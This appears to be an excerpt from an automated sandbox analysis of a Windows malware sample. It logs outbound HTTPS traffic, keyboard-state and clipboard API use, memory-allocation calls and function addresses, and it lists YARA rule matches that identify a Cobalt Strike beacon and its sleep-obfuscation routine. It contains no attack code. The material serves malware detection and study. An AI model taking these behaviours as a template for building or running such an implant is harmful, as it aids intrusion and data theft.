            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140145214 SrcHashImpl::SrcHashImpl,CreateCompatibleDC,CreateCompatibleBitmap,FillRect,OpenClipboard,EmptyClipboard,CloseClipboard,SetClipboardData,CloseClipboard,0_2_0000000140145214
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140158178 GetAsyncKeyState,0_2_0000000140158178
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400B4288 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageW,ScreenToClient,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,GetParent,0_2_00000001400B4288
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013D824 GetKeyState,GetKeyState,GetKeyState,0_2_000000014013D824

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_3_01FC0020 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtProtectVirtualMemory,0_3_01FC0020
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_3_01FC11E00_3_01FC11E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_3_01FC47C90_3_01FC47C9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_3_01FC6A450_3_01FC6A45
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400757A80_2_00000001400757A8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140093FEC0_2_0000000140093FEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401AC0240_2_00000001401AC024
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014016009C0_2_000000014016009C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400541580_2_0000000140054158
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013C1490_2_000000014013C149
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401741F80_2_00000001401741F8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401781F40_2_00000001401781F4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400BC26C0_2_00000001400BC26C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400FC2800_2_00000001400FC280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400B42880_2_00000001400B4288
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400802B40_2_00000001400802B4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014015C2D80_2_000000014015C2D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014018C36C0_2_000000014018C36C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401583700_2_0000000140158370
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400845680_2_0000000140084568
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400C05640_2_00000001400C0564
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400F85880_2_00000001400F8588
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014012C5C00_2_000000014012C5C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401EC6080_2_00000001401EC608
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400686C80_2_00000001400686C8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401E06F00_2_00000001401E06F0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401507500_2_0000000140150750
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400047700_2_0000000140004770
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400B09200_2_00000001400B0920
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014006C9400_2_000000014006C940
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400809340_2_0000000140080934
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401809A00_2_00000001401809A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014007CA780_2_000000014007CA78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014012CA640_2_000000014012CA64
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140134A900_2_0000000140134A90
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140064AE80_2_0000000140064AE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140188B300_2_0000000140188B30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140034B580_2_0000000140034B58
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140024B700_2_0000000140024B70
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140170B9C0_2_0000000140170B9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014002CBA00_2_000000014002CBA0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400ACC780_2_00000001400ACC78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400B8CF80_2_00000001400B8CF8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401FCD940_2_00000001401FCD94
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014014CD9C0_2_000000014014CD9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014005CE140_2_000000014005CE14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401E0E780_2_00000001401E0E78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014009CE9C0_2_000000014009CE9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140044F680_2_0000000140044F68
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401E0F980_2_00000001401E0F98
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400A8FBC0_2_00000001400A8FBC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140114FEC0_2_0000000140114FEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401D502C0_2_00000001401D502C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014008D14C0_2_000000014008D14C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400D52180_2_00000001400D5218
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400952740_2_0000000140095274
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400E52880_2_00000001400E5288
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401D52C40_2_00000001401D52C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401752E80_2_00000001401752E8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014016D3540_2_000000014016D354
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400A137C0_2_00000001400A137C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014009937C0_2_000000014009937C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400D13780_2_00000001400D1378
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401854600_2_0000000140185460
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014005145C0_2_000000014005145C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014006D4C80_2_000000014006D4C8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401254FC0_2_00000001401254FC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400CD5080_2_00000001400CD508
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401D55380_2_00000001401D5538
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401F15300_2_00000001401F1530
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400DD6AC0_2_00000001400DD6AC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401416C00_2_00000001401416C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014010D6C00_2_000000014010D6C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014004D7BC0_2_000000014004D7BC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401158500_2_0000000140115850
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400FD8880_2_00000001400FD888
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400C19100_2_00000001400C1910
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400B59740_2_00000001400B5974
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401519940_2_0000000140151994
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014012DA140_2_000000014012DA14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013DA6C0_2_000000014013DA6C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014014DB200_2_000000014014DB20
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401D5B100_2_00000001401D5B10
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401CDB400_2_00000001401CDB40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140135B300_2_0000000140135B30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140119B580_2_0000000140119B58
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400D1B840_2_00000001400D1B84
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400A1C280_2_00000001400A1C28
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014016DC240_2_000000014016DC24
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140105C800_2_0000000140105C80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140081C800_2_0000000140081C80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400F5CA80_2_00000001400F5CA8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140049CC40_2_0000000140049CC4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140109D400_2_0000000140109D40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140065D580_2_0000000140065D58
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014015DD640_2_000000014015DD64
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400F5DE00_2_00000001400F5DE0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140139F280_2_0000000140139F28
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140185F480_2_0000000140185F48
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140051F980_2_0000000140051F98
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140159F880_2_0000000140159F88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401120580_2_0000000140112058
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401620480_2_0000000140162048
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014004A11C0_2_000000014004A11C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401521540_2_0000000140152154
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400C21A10_2_00000001400C21A1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400BA1CC0_2_00000001400BA1CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400621E40_2_00000001400621E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014015E2000_2_000000014015E200
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014008229C0_2_000000014008229C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014014A2E40_2_000000014014A2E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401DE3140_2_00000001401DE314
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014016E3B00_2_000000014016E3B0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401264900_2_0000000140126490
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401325000_2_0000000140132500
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401724E80_2_00000001401724E8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400F65500_2_00000001400F6550
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401FE5AC0_2_00000001401FE5AC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400B65E40_2_00000001400B65E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400966100_2_0000000140096610
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013E6C00_2_000000014013E6C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400CA6EC0_2_00000001400CA6EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401A27100_2_00000001401A2710
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400C271C0_2_00000001400C271C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014016A7740_2_000000014016A774
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400E67A40_2_00000001400E67A4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400927C80_2_00000001400927C8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401DE8480_2_00000001401DE848
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401568700_2_0000000140156870
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014006288C0_2_000000014006288C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401AA8BC0_2_00000001401AA8BC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014005A8E40_2_000000014005A8E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401169540_2_0000000140116954
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400D29D80_2_00000001400D29D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: String function: 0000000140200750 appears 186 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: String function: 000000014003443C appears 45 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: String function: 00000001400064B0 appears 41 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: String function: 000000014002C650 appears 79 times
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeBinary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
